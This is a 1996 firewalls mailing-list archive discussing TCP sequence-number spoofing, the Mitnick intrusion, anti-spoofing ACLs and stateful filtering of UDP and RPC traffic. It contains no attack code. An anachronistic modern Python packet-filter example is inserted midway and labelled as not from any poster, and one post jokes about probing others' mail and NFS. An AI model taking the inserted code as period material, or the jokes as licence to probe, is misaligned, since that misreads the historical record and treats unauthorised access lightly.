The SPA really only goes after large piraters (i.e. corporations) and only after being pushed by a vendor. They also get some sort of a significant fee for following up on these cases, often even when the vendor does not get anything. Kinda seems like these people are profiteers, and will only get involved if there is money in it for them. I can NOT respect that. IMO they should be non-profit. Fees should go to vendors. Private funding is another possibility. If PBS can do it, and EFF can do it, so can they.

This situation, IMO, makes them worse than the pirater. Many times the people who pirate are either in situations as described above (a company buys the product and licenses, and as they grow, they do not pay for the additional licenses necessary), or some kids running a board or anon ftp site on the net. Businesses can save money, but not necessarily profit off of this (IMO, in this situation a penny saved is NOT a penny earned since the 2 situations are totally different). The only one who profits is the SPA. Seems to me like the ones who are profiting off of pirating are the ones who hold themselves as "high and mighty" and "righteous". Seems to me like they are pulling the wool over everyone's eyes. It just doesn't seem right. Just another Big Business scam like CNN and MTV (other, even more off-topic posts). I hope that I am wrong about this.

An interesting note. Remember when Win95 was in beta and M$ announced a $10,000 reward for information leading to piraters of their betas? What a crock of shit! On our system we had 2 guys who were working together to pirate Win95 and many other software pkgs. over IRC. They were into it big time, getting a dedicated connection (64k), and setting up HUGE pirate ftp sites on their machines. As soon as we knew about it we contacted (well, my bosses did) the FBI, SPA, and M$. We still have not heard from the SPA (this was over a year ago).
I guess there was just no getting money off of someone that was not a corporation. M$ looked at the situation, and showed no interest. The FBI looked. We showed them logs of packets, email, etc. The FBI got into the piraters' machines and made logs of all of the directories, etc. They had enough evidence to convict. *Then* M$ took a *little* interest, but eventually declined to do a thing about it. Either they really just didn't care about the pirating and the whole reward thing was a farce, or they were just too damn cheap, and didn't want to face the fact that they may actually have to give up $10,000!! They declined any further involvement. The FBI eventually ended up losing interest as well, and shortly after we realized that no one wanted to do anything, we just cut those accounts off.

SPA - Bah! FBI - Bah! M$ - cheap bastard Bah!

---off soap-box now, and putting asbestos on------

Brain21

From firewalls-owner Thu Jan 11 09:51:14 1996
Date: Thu, 11 Jan 1996 11:06:35 -0500 (EST)
From: Scott Barman
To: "A. Padgett Peterson, P.E. Information Security"
Cc: firewalls@greatcircle.com
Subject: Re: Sequence number attacks
In-Reply-To: <960111091047.20200f9e@hobbes.orl.mmc.com>

On Thu, 11 Jan 1996, A. Padgett Peterson, P.E. Information Security wrote:

> Steve wrote:
> >A couple of months ago, I did come up with a strong but simple defense
> >against sequence number attacks.
> >For details, see
> >ftp://ds.internic.net/internet-drafts/draft-rfced-info-bellovin-00.txt
>
> Is easy also to make the first line in your firewall ACL "Deny incoming
> ". Belt and suspenders are good 8*).

Wouldn't doing this break some MUAs that are looking to connect to their smtp server locally or the system defined as mailhost (which is usually never defined as localhost)? I forget which MUA off hand, but I remember seeing this as a problem when I specified "Deny ALL" without allowing for some connection to my local system.

scott barman
--
scott barman            DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com    and I speak only for myself.
barman@ix.netcom.com
"Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." - scott barman

From firewalls-owner Thu Jan 11 10:40:42 1996
Message-Id: <199601111732.JAA02316@spike.hnc.com>
Date: Thu, 11 Jan 1996 09:32:23 -0800
To: firewalls@greatcircle.com
From: David Loysen
Subject: Re: Allow SSL through a firewall?

At 12:59 PM 1/10/96 CST, you wrote:
>Subject: Allow SSL through a firewall?
>
>I would like to allow access from the Internet to a WWW server that would
>have access to our corporate data. Because of the security implications,
>I would like that WWW server to be behind a firewall. I have tried to
>outline my design below and I would appreciate any comments about
>possible problems I may be opening myself up for.
>
>            ************                   !
> client------* Internet *------Firewall---!---WWWserver
>            ************                   !
>                                        Internal
>                                        Network
>

Maybe lurking around on this list is making me paranoid....... But why not put the WWW server and whatever data you want the world to see outside the firewall? Isn't it cheaper to duplicate the non-secure data outside the firewall than to deal with the results of somebody using the WWW server to get to your really important data?

"When the going gets weird, the weird turn pro."
Hunter S. Thompson, The Curse of Lono.

dwl@hnc.com               HNC Software Inc.
David Loysen              5930 Cornerstone Ct.
West                      (619) 546-8877 x245
San Diego, CA 92121-3728  fax (619) 452-6524

From firewalls-owner Thu Jan 11 10:44:04 1996
Date: Thu, 11 Jan 1996 12:54:09 -0300 (WDT)
From: Juan Carlos Machado
To: firewalls@greatcircle.com
Subject: XTACACS Help Needed

Hi all,

I installed XTACACS on my Sun Sparc running Solaris 2.4. We have a CISCO Access Server and I followed all the instructions from CISCO. When a home access user connects to my company, the wtmp file increases in size, but when I try to see it with TACUPD I get an error:

ERROR: missing utmp & wtmp filenames.

Could somebody help me?

Thanks a lot

Juan Carlos Machado Z.    jmachado@ciat.cgiar.org
Network Support           j.machado@cgnet.com
Voice Ph#: (57-2)4450-691
CIAT (International Center for Tropical Agriculture)
Cali - Valle - Colombia.
Phone: 4450000
JK:= NOT(reflect(opinions' self,opinions' employer));

From firewalls-owner Thu Jan 11 11:00:30 1996
Message-Id: <199601111732.JAA11925@nowhere.esd.sgi.com>
From: Ping Huang
To: HFDK41A@prodigy.com (MR. JOHN K MOLNAR)
cc: firewalls@greatcircle.com
Subject: Re: Mergent Gauntlet?
In-reply-to: Your message of "Wed, 10 Jan 96 14:05:00 EST." <091.08356360.HFDK41A@prodigy.com>
Date: Thu, 11 Jan 96 09:32:13 -0800

HFDK41A@prodigy.com (MR. JOHN K MOLNAR) wrote:
> I got a fax this morning from Mergent, offering to sell me their
> Gauntlet Firewall???
> What's a Gauntlet if it's not from TIS?
> Or is this the same stuff??

TIS has business relationships with a number of resellers for the Gauntlet product --- perhaps Mergent is one of these resellers. In addition, SGI is an OEM for Gauntlet and sells the SGI port of Gauntlet directly to customers as part of the WebFORCE product line.

--
Ping Huang | Voice (415) 933-6256 | FAX (415) 390-6159
Silicon Graphics, Inc., 2011 N Shoreline Blvd. 1L-945, Mt.
View CA 94043
Disclaimer: unless explicitly otherwise stated, my statements represent my personal viewpoints only.

From firewalls-owner Thu Jan 11 11:01:32 1996
Date: Thu, 11 Jan 1996 11:50:54 -0600 (CST)
From: Ron DuFresne
To: Brain21
cc: Doug Hughes , firewalls@GreatCircle.COM
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting)

On Wed, 10 Jan 1996, Brain21 wrote:

> On Wed, 10 Jan 1996, Doug Hughes wrote:
>
> > 2) the spoofing attack had not become common knowledge and widespread use
> > until this series of attacks was demonstrated. Papers had been around
> > for years on the potential for this, but, as I recall, until this time,
> > there weren't any hacker tools that were widely known about for exploiting.
>
> I agree, but the possibility is always there. If you are in the security
> business, then it pays to protect against everything possible, and not to
> underestimate your "adversaries."
>
> > Remember, (Not that this means anything but), the CERT advisory wasn't
> > published until 1/23 95 and the attacks took place over Xmas of '94.
> > To the best of my recollection, the sequence number randomizing (which
> > is MUCH harder to implement than the router rules that prevent spoofing)
> > wasn't available until January of '95 either.
> > Now, CERT is usually slow about announcing such things, but, the patch
> > was relatively simple to implement in a router, so, you'd think that
> > not long after they heard about it, it would be posted. Even the sites
>
> That doesn't necessarily mean anything. I've seen advisories come out
> from cert WELL after other advisories have come out on other mailing
> lists, with patches and everything.
>
> I think my point is that Shimomura should not have underestimated Mitnick
> or anyone, especially since he KNEW that it was possible.
> Overconfidence? I don't know. Maybe Shimomura didn't even set up the
> security there and trusted it? I don't know. I just find it kinda ironic.
>
> Brain21

Agreed, either we have here an extreme case of over-confidence, misconfiguring by others really doing the security, or good old Mitnick was 'invited' in a case bordering on entrapment. Seems very strange either way, seems strange if not an outright blunder.

Later,

Ron Dufresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
From firewalls-owner Thu Jan 11 11:02:17 1996
Date: Thu, 11 Jan 1996 13:09:12 -0500 (EST)
From: Brain21
To: Frank Willoughby
cc: firewalls@GreatCircle.COM
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG
In-Reply-To: <9601110235.AA03286@su1.in.net>

Since my posting on Mitnick, people have fallen into several camps it seems (BTW, my posting was meant to spur discussion and demonstrate a different outlook on the situation. I do NOT know what the situation was, and that is why it was full of questions. Hopefully I conveyed that, though if I did not it wouldn't be the first time). The camps are:

1) "Conspiracy" - i.e., involvement of the CIA, NSA, or any other organization with initials. (Personally, I don't buy this.)

2) He was careless with his own system, and overconfident (the scenario I put forth).

3) He did not have control over the security of the system that he was on (something that Frank stated, and that I stated as a possibility as well in a private email to someone else).

4) Lack of security was done on purpose in order to study hacking attempts, etc.

My personal opinion is either 2 or 3. Has anyone on the list actually discussed this with him? I would be interested in his side, since we all really only have part of the story. Anyone?
Brain21

From firewalls-owner Thu Jan 11 11:05:15 1996
Date: Thu, 11 Jan 96 13:27:17 EST
From: "Jim Meritt"
Message-Id: <9600118213.AA821396873@smtpinet.aspensys.com>
To: firewalls@greatcircle.com, Benjamin Allan Smith
Subject: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimomura

Concur. DISNET yes. Internet no. Unless maybe you/he WANT him arrested.... Or maybe he was just spinning a tale and you fell for it. Or maybe he just didn't understand how it was working.

Jim Meritt (LCDR USNR, last active Department of the Navy Information Resources Management, civilian job Department of Defense Intelligence Information Systems division)

______________________________ Reply Separator _________________________________
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (L
Author: Benjamin Allan Smith at SMTPINET
Date: 1/11/96 6:53 AM

Brain21 wrote:
>Hell, my father used
>to do top secret work for the Dept. of Defense (he needed "Q" clearance,
>and needs higher now) and the office where he worked communicated to its
>other offices over the net. They used netcom. Not too terribly secure
>if you ask me. They did not use encryption.

I highly doubt that.
Every machine that I have seen on base which has Secret (or higher) data is not allowed to have *any* physical connection with the Internet (the mjr 100% sure firewall to the Internet: cut the wires). Once someone inadvertently emailed the classified name of a project over a network connected to the Internet. The day was spent completely wiping all of the hard drives on all of the machines that might have received that email (3 complete overwrites with random data if I recall correctly) and then the OS and data were restored from the previous night's backups. A head rolled for that error. So if all that effort was made over a single word, I *highly* doubt that your father used netcom to discuss classified matters.

Ben
-------------------------------------------------------------------------------
Benjamin Smith------------bens@vislab.navy.mil---------1972 Land Rover SIII 88
Science Applications International Corporation
Naval Air Warfare Center, Weapons Division, China Lake
"...If I were running such a contest, I would specifically eliminate any entry from Ben involving driving the [Land] Rover anywhere. He'd drive it up the Amazon basin for a half can of Jolt and a stale cookie..." --Kevin Archie

From firewalls-owner Thu Jan 11 12:23:04 1996
Date: Thu, 11 Jan 1996 11:47:29 +0100
To: "A. Padgett Peterson, P.E. Information Security" , firewalls@greatcircle.com
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: Sequence number attacks

At 9:10 AM 1/11/96, "A.
Padgett Peterson, P.E. Information Security"
>Steve wrote:
>>A couple of months ago, I did come up with a strong but simple defense
>>against sequence number attacks. For details, see
>>ftp://ds.internic.net/internet-drafts/draft-rfced-info-bellovin-00.txt
>
>Is easy also to make the first line in your firewall ACL "Deny incoming
>". Belt and suspenders are good 8*).

Note that this only keeps the spoofers from masquerading as a machine with one of your IP addresses. If you trust things at other sites, with other IP addresses, the rule Padgett mentions doesn't keep the spoofers from masquerading as those trusted things at other sites.

-Brent
----------------------+----------------------------+------------------------
Brent Chapman         | Great Circle Associates    | 1057 West Dana Street
Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041
----------------------+----------------------------+------------------------
Internet Tutorials from the Experts!

From firewalls-owner Thu Jan 11 12:44:05 1996
Date: Thu, 11 Jan 1996 15:27:06 -0500 (EST)
From: Brain21
To: Benjamin Allan Smith
cc: firewalls@GreatCircle.COM
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting)
In-Reply-To: <199601111046.CAA18112@archimedes.vislab.navy.mil>

On Thu, 11 Jan 1996, Benjamin Allan Smith wrote:

> email (3 complete overwrites with random
> data if I recall correctly) and then

I thought that the NSA could read approx. 7 writes deep. I thought that you just put bullets in those drives (quite literally) instead of rewriting them.

Brain21

From firewalls-owner Thu Jan 11 12:58:43 1996
Date: Thu, 11 Jan 1996 11:32:18 +0100
To: Brian Murrell , Firewalls@GreatCircle.COM, mjr@switchblade.v-one.com
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: Firewalls-Digest V5 #14

At 9:05 AM 1/11/96, Brian Murrell wrote:
>> To make matters worse a lot of UDP applications (most
>> notably Sun RPC, and RealAudio) run on arbitrary ports, which
>> makes them even harder to sensibly track. A lot of folks are
>> comfortable letting UDP port 53 (DNS) into their firewalls.
>> DNS is pretty well-known and well-behaved. Not so RPC.
>
>Some points and questions. Real Audio can be handled by a "stateful packet
>filter". Firewall-1 have recently put some filtering rules on their Web site
>for FW-1 users to add to their rulebase to allow RealAudio in. I checked just
>to make sure they weren't opening the big hole. The datastream does seem to
>carry the return port in the clear much like FTP's data connection PORT
>command.
>It's a little more complicated but the theory is the same.

Two problems here. First, not everybody has Firewall-1 filtering systems, or any other stateful filtering system.
It's good that those who do can deal with RealAudio, but it doesn't change the fact that the RealAudio protocol is poorly designed, at least from a security point of view. Second, even this only works if all you want are outgoing connections.

>I do agree the that unpredictability of RPC application port numbers is a
>pain,
>but stateful packet filters solve that problem. They watch for the portmapper
>traffic to "learn" what services are on what ports.

Again, only if all you want to allow are outgoing connections.

>However, is the RPC
>infrastructure itself without any actual RPC programs insecure?? Does it have
>any vulnerabilities in and of itself, or is the nature of RPC and how it maps
>ports (somewhat randomly) from a pool that you find insecure??

It's the nature of RPC that makes it difficult to control. You can't easily allow some RPC-based services and disallow others. You can't easily disallow all RPC-based services, even.

>Do the actual
>applications that use RPC calls have any "extra vulnerabilities" because they
>were written with RPCs??

Not that I can think of, other than being difficult to control access to.

>Can you point me to any papers on any of the above??

There was a paper written by the folks at Texas A&M a few years ago that addressed insecurities of NIS/YP in particular, and I think (if I recall correctly) also spoke about the problems with RPC in general. It's available from ftp://net.tamu.edu/pub/security/TAMU/NIS_Paper.ps.gz

-Brent
----------------------+----------------------------+------------------------
Brent Chapman         | Great Circle Associates    | 1057 West Dana Street
Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041
----------------------+----------------------------+------------------------
Internet Tutorials from the Experts!
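The two filtering discussions above, the "Deny incoming <your own addresses>" first ACL line from the "Sequence number attacks" thread (with Scott Barman's local-mail worry and Brent Chapman's point that it does nothing for hosts you trust at other sites) and the stateful "permit only replies to flows started from inside" logic Brian Murrell and Brent describe for UDP, as an added example that is not code from any poster. The address block, interface names, ports and the "trusted" remote host are constructed for the demonstration.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Constructed site layout (an assumption, not from the thread): our own
# address block, the loopback range, and one host at another site that our
# machines trust by IP address (the address-based trust Brent warns about).
OUR_NETS = [ip_network("192.0.2.0/24")]
LOOPBACK = ip_network("127.0.0.0/8")
TRUSTED_REMOTE = ip_address("198.51.100.7")


@dataclass(frozen=True)
class Packet:
    iface: str    # "ext" = arrived from the Internet, "int" = from inside, "lo" = loopback
    src: str
    dst: str
    proto: str    # "tcp" or "udp"
    sport: int
    dport: int
    syn: bool = False   # TCP only: a connection-opening SYN


class Filter:
    """Toy stateful packet filter: anti-spoofing rules first, then
    'permit replies to flows we started' for everything else."""

    def __init__(self):
        # Flows started from inside: (proto, inside addr, inside port, remote addr, remote port)
        self.flows = set()

    @staticmethod
    def _is_ours(addr):
        return any(addr in net for net in OUR_NETS)

    def decide(self, pkt):
        """Return (verdict, reason) for one packet."""
        src, dst = ip_address(pkt.src), ip_address(pkt.dst)

        # Loopback never crosses the firewall, so an MUA talking to its local
        # smtp server is unaffected (the problem Scott hit with "Deny ALL").
        if pkt.iface == "lo":
            return "permit", "loopback traffic stays local"

        # Padgett's rule: the first ACL line denies anything arriving from the
        # outside that claims one of our own addresses (or a loopback address).
        if pkt.iface == "ext" and (self._is_ours(src) or src in LOOPBACK):
            return "deny", "anti-spoof: external packet with an internal source"

        # Mirror image on the inside interface: nothing leaves with a foreign
        # source, so our site cannot be used to spoof somebody else.
        if pkt.iface == "int":
            if not self._is_ours(src):
                return "deny", "egress: internal packet with a foreign source"
            self.flows.add((pkt.proto, src, pkt.sport, dst, pkt.dport))
            return "permit", "outbound; flow recorded for the reply"

        # Inbound from the Internet: replies to recorded flows are fine. This is
        # how a stateful filter copes with DNS, RPC or RealAudio replies that
        # come back on ports chosen at run time (outgoing connections only).
        if (pkt.proto, dst, pkt.dport, src, pkt.sport) in self.flows:
            return "permit", "reply to a flow started from inside"

        # Address-based trust of a remote host. The anti-spoof rule above never
        # matches a packet claiming to be this host, so the filter cannot tell
        # a genuine connection from a forged one; only unpredictable sequence
        # numbers (the Bellovin draft) help here. That is Brent's point.
        if pkt.proto == "tcp" and pkt.syn and src == TRUSTED_REMOTE:
            return "permit", "trusted remote host (address-based trust only)"

        return "deny", "unsolicited inbound packet"


def run_demo():
    """Push a constructed packet sequence through the filter; returns the verdicts."""
    fw = Filter()
    packets = [
        Packet("ext", "192.0.2.5", "192.0.2.10", "tcp", 1023, 513, syn=True),     # forged internal source
        Packet("ext", "127.0.0.1", "192.0.2.10", "tcp", 1023, 513, syn=True),     # forged loopback source
        Packet("lo", "127.0.0.1", "127.0.0.1", "tcp", 40000, 25),                 # local MUA -> local smtp
        Packet("int", "192.0.2.10", "203.0.113.9", "udp", 1234, 53),              # outbound DNS query
        Packet("ext", "203.0.113.9", "192.0.2.10", "udp", 53, 1234),              # the matching reply
        Packet("ext", "203.0.113.9", "192.0.2.10", "udp", 53, 4321),              # no such flow
        Packet("ext", "198.51.100.7", "192.0.2.10", "tcp", 1023, 513, syn=True),  # "trusted" host passes anti-spoof
        Packet("int", "10.0.0.1", "203.0.113.9", "udp", 1234, 53),                # egress check
    ]
    return [fw.decide(p) for p in packets]


if __name__ == "__main__":
    for verdict, reason in run_demo():
        print(f"{verdict:6s} {reason}")
```

The seventh packet is the one the thread is really about: it carries a source the anti-spoof line cannot reject, so whether it is genuine is decided by the TCP handshake, not by the ACL.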
From firewalls-owner Thu Jan 11 13:10:35 1996
Date: Thu, 11 Jan 1996 09:18:17 -0600 (CST)
From: Alan Dowd
To: Andrew Cameron
Subject: Re: Internet Policy/Security Policy

On Wed, 10 Jan 1996, Andrew Cameron wrote:

> I would like to know where I can find examples of an Internet/Security
> Policy for a company.
>
> I will need to write one in the near future and would like to draw on
> the experience of others.
>
> Thanks in anticipation
>
> -----------------------------------------------------------------------------
>
> Andrew Cameron
> Internet : andrew@andy.alt.za
> X.400 : C=ZA G=Andrew S=Cameron Admd=TELKOM400
>
> ----------------------------------------------------------------------------

The best online source for security policies that I've found is:

ftp://coast.cs.purdue.edu/pub/doc/policy

It includes a lot of academic policies and a selection of various governmental policies and standards. There are also a few Federal examples at:

http://www.first.org

Query to All: This ("Where can I find policies online?") is a recurring question on Firewalls. I've not chased down the FAQ lately. Has this question yet been added to it?
Regards,
--
Alan Dowd                     Phone: +1 612 628 1641
Secure Computing Corporation  FAX: +1 612 628 2701
2675 Long Lake Road           URL: http://www.sctc.com
Roseville, MN 55113-2536      E-Mail: dowd@sctc.com
--

From firewalls-owner Thu Jan 11 13:13:02 1996
Message-Id: <199601112054.MAA00995@miles.greatcircle.com>
From: Cyrus John
Subject: Re: Firewalls-Digest V5 #19
To: Firewalls@GreatCircle.COM
Date: Thu, 11 Jan 96 15:53:27 EST
In-Reply-To: <199601111752.JAA27121@miles.greatcircle.com>; from "firewalls-digest-owner@uunet.uu.net" at Jan 11, 96 9:52 am

13

From firewalls-owner Thu Jan 11 13:13:38 1996
Message-Id: <9601112016.AA8871@notes.cch.com>
To: firewalls
From: "Richard Giering Jr."
Date: 11 Jan 96 14:12:42
Subject: MSN proxy?

I've been told that Microsoft has opened access to MSN from the Internet. Does anyone have any technical information on this?

FYI - I'm subscribed to the digest and so won't respond right away to a response to the list. Email on the other hand is a different matter.

Rick Giering (Webmaster, Postmaster, Firewall Ranger)
CCH, Inc.

From firewalls-owner Thu Jan 11 13:14:05 1996
Date: Thu, 11 Jan 1996 15:29:56 -0500 (EST)
From: Brain21
To: Ng Pheng Siong
cc: Frank Willoughby , firewalls@GreatCircle.COM, John Young
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting)

On Thu, 11 Jan 1996, Ng Pheng Siong wrote:

> Shimomura had almost complete packet traces of the break-in, which
> allowed him to reconstruct the attack.
>
> It was a trap.

Personally I can not conclude that from what you have stated. I would hope that he would be logging stuff as a matter of course.
How did he KNOW that Mitnick or anyone was going to attack his machine specifically? If it were done "to see what happens" then maybe I could buy it, but if it were "a trap for Mitnick" he would have to be psychic as well.

Brain21

From firewalls-owner Thu Jan 11 13:29:05 1996
Date: Thu, 11 Jan 1996 15:16:17 -0500 (EST)
From: Brain21
To: Brett Lymn
cc: firewalls@greatcircle.com
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting)
In-Reply-To: <9601110955.AA27779@bunya.awadi>

On Thu, 11 Jan 1996, Brett Lymn wrote:

> According to Brain21:
> >
> >Hell, my father used
> >to do top secret work for the Dept. of Defense (he needed "Q" clearance,
>
> be classified. I bet all the secret documents/matters were not sent
> over the net (though I could be wrong....) - it is certainly the way
> things work here.

Well, I would hope that that was true, and I would suspect that it was, but my father DID call me once and ask about encryption and keeping his mail from prying eyes. There is always the problem of someone getting careless and sending something or mentioning something over insecure connections by accident when that communication was supposed to be for secured lines of communication. (My Dad was not allowed to give me his email address).
Brain21

From firewalls-owner Thu Jan 11 13:48:31 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA29897 for firewalls-outgoing; Thu, 11 Jan 1996 12:14:56 -0800 (PST)
Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA29890 for ; Thu, 11 Jan 1996 12:14:52 -0800 (PST)
Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id OAA10014 for ; Thu, 11 Jan 1996 14:13:39 -0600 (CST)
Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id OAA10010 for ; Thu, 11 Jan 1996 14:13:39 -0600 (CST)
Received: from mario.sctc.com (mario.sctc.com [172.17.192.177]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id OAA23479 for ; Thu, 11 Jan 1996 14:14:15 -0600 (CST)
Received: (from dowd@localhost) by mario.sctc.com (8.6.12/8.6.9) id OAA04295; Thu, 11 Jan 1996 14:14:13 -0600
Date: Thu, 11 Jan 1996 14:14:13 -0600 (CST)
From: Alan Dowd
To: firewalls@GreatCircle.COM
Subject: Re: Internet Policy/Security Policy (fwd)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Greetings, Firewallers!

Earlier today I responded to Andrew Cameron's question about security policies. I _thought_ I had cc'd the list, but obviously didn't. I should not try to do anything involving the cognitive faculties before I have finished my first pot of coffee. ;-)

Anyway, the question I posed to All still holds.

Regards,
--
Alan Dowd                        Phone: +1 612 628 1641
Secure Computing Corporation     FAX: +1 612 628 2701
2675 Long Lake Road              URL: http://www.sctc.com
Roseville, MN 55113-2536         E-Mail: dowd@sctc.com
--

---------- Forwarded message ----------
On Wed, 10 Jan 1996, Andrew Cameron wrote:

> I would like to know where I can find examples of an Internet/Security
> Policy for a company.
>
> I will need to write one in the near future and would like to draw on
> the experience of others.
>
> Thanks in anticipation
>
> -----------------------------------------------------------------------------
>
> Andrew Cameron
> Internet : andrew@andy.alt.za
> X.400 : C=ZA G=Andrew S=Cameron Admd=TELKOM400
>
> ----------------------------------------------------------------------------

The best online source for security policies that I've found is:

    ftp://coast.cs.purdue.edu/pub/doc/policy

It includes a lot of academic policies and a selection of various governmental policies and standards. There are also a few Federal examples at:

    http://www.first.org

Query to All: This ("Where can I find policies online?") is a recurring question on Firewalls. I've not chased down the FAQ lately. Has this question yet been added to it?

Regards,
--
Alan Dowd                        Phone: +1 612 628 1641
Secure Computing Corporation     FAX: +1 612 628 2701
2675 Long Lake Road              URL: http://www.sctc.com
Roseville, MN 55113-2536         E-Mail: dowd@sctc.com
--

From firewalls-owner Thu Jan 11 13:59:05 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA28827 for firewalls-outgoing; Thu, 11 Jan 1996 11:17:24 -0800 (PST)
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA28819 for ; Thu, 11 Jan 1996 11:16:34 -0800 (PST)
Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzybz07856; Thu, 11 Jan 1996 13:55:46 -0500 (EST)
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA26453; Thu, 11 Jan 96 13:45:57 EST
Date: Thu, 11 Jan 1996 13:45:56 -0500 (EST)
From: Sick Puppy
Subject: Relijon, Firewalls, Filosofi
To: firewalls@GreatCircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Relijon

I spent my New Year vacation chewing mushrooms and peeing on cactus in the Arizona desert.
Ah am right proud to say that I growed the mushrooms myself by following the Gingrich Guidelines for Managing Federal Employees, "Keep them in the dark and feed them bullshit."

As I was carefully licking my wounds and looking for a cactus with a lot less spikes than the last one, I found two paper plates, twelve empty beer cans and a fragile roll of parchment covered in a strange brown script. Cos it was fragile, I took the roll to Dockmaster, The Master of All Mushrooms, and asked for an instant decode of the strange script.

When I got the decode, one week later, I wondered aloud "do they employ cryptanalysts who smoke but don't inhale?" But then I realized, it was a Book of RevelAshuns, from The Church of the Dead Meow. It sez In the Beginning there was RedBeard and he dreamed of strange machines called fyrewalz. Then Gwad created Red Boots but she (Red Boots) had no respect for RedBeard because she knew he was only after one thing, (an unpaid assistant to help write neat code). Red Boots stomped all over RedBeard with her long spiky 6 inch heels but he loved it and they begat a firewall. And that firewall begat other firewalls.

Firewalls

Now suppose that I had to use a Firewall-1 machine and wanted to tighten up security by adding authentication and encryption. I heard that V-One has a couple of add-on products, one called SmartGate, the other called SmartCAT (there ain't no such animal) which can provide the authentication and encryption on top of another vendor's packet filtering firewally. Does anyone have any experience running this stuff on top of Firewall-1?

As I ponder connecting my systems at home to the Internet through a 500 kbps cable modem and the cable television network, I also wonder what my options are for an El Cheapo but effective firewall to protect my personal stuff.

Filosfi

Now not too long ago there was a serious misunderstanding about the educational research I was doing on someone else's mail and NFS.
I got this real polite e-mail from CERT asking if I knew anything about the origin of the "attacks". Now being a simple country dawg, I reckon that being investigated by CERT should be worn like a badge of honour. Can I legitimately claim in my postings that I am CERTified?

Since my last posting, several people asked which consultant I was talking about at TIS. Why its Char of course, the one who wears smudged makeup and grey granny dresses. Miss Char Broil brought her secret sauce to TIS last year when she left the ATF at Waco, Texas. Yeah, I know that stinks, but then so do many of the things I eat. Frankly, I find it amazing that anyone is fool enough to believe that I actually know anyone at TIS.

No flames please. The subject line was enough to let you know what was next to the fire hydrant. But you stepped right into it.

Sick Puppy, the Cat_Eating_Dawg
SchniffMeisterCracker

From firewalls-owner Thu Jan 11 14:14:05 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA28768 for firewalls-outgoing; Thu, 11 Jan 1996 11:14:54 -0800 (PST)
Received: from switchblade.v-one.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA28753 for ; Thu, 11 Jan 1996 11:13:58 -0800 (PST)
Received: (from mjr@localhost) by switchblade.v-one.com (8.6.9/8.6.9) id OAA13809; Thu, 11 Jan 1996 14:13:10 -0500
From: "Marcus J. Ranum"
Message-Id: <199601111913.OAA13809@switchblade.v-one.com>
Subject: Re: Firewalls-Digest V5 #14
To: murrell@bctel.net (Brian Murrell)
Date: Thu, 11 Jan 1996 14:13:09 -0500 (EST)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: <199601111705.JAA18920@mocha.bctel.net> from "Brian Murrell" at Jan 11, 96 09:05:29 am
Reply-To: mjr@switchblade.v-one.com
Organization: V-One Corporation, Baltimore, MD
Office URL: Mjr's page
Phone: 410-889-8569
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Brian Murrell writes:
>Real Audio can be handled by a "stateful packet
>filter". Firewall-1 have recently put some filtering rules on their Web site
>for FW-1 users to add to their rulebase to allow RealAudio in. I checked just
>to make sure they weren't opening the big hole. The datastream does seem to
>carry the return port in the clear much like FTP's data connection PORT

The mode most people want to run their firewall in is:

	"What goes out can come back in"
	"What wasn't invited in, isn't welcome"

a sort of a one-way mirror so that the folks behind it can do whatever they want to the 'net but the 'net can't do whatever it wants to them. Based on that goal, the requirement of the firewall is to have some level of "understanding" of what went out, and whether or not to let responses back in. The rest is an implementation detail. It's a *BIG* implementation detail, but it's just an implementation detail.

If Checkpoint's product is "smart" enough to provide the desired connection semantics, it makes little difference to me whether it's application level or network level implementation - as long as the goal is accomplished. The argument of "application level" versus "smart packet filtering" or "dynamic screening" or whatever it's being called this week is a really silly one. The question is: DOES THE THING DO WHAT IT HAS TO DO?
Classical application level proxies are an implementation detail based on the ease with which one can take advantage of the kernel's state-maintenance for TCP sessions, and the fact that it is easier to write application code than kernel code, if you haven't got a kernel source license. That's it.

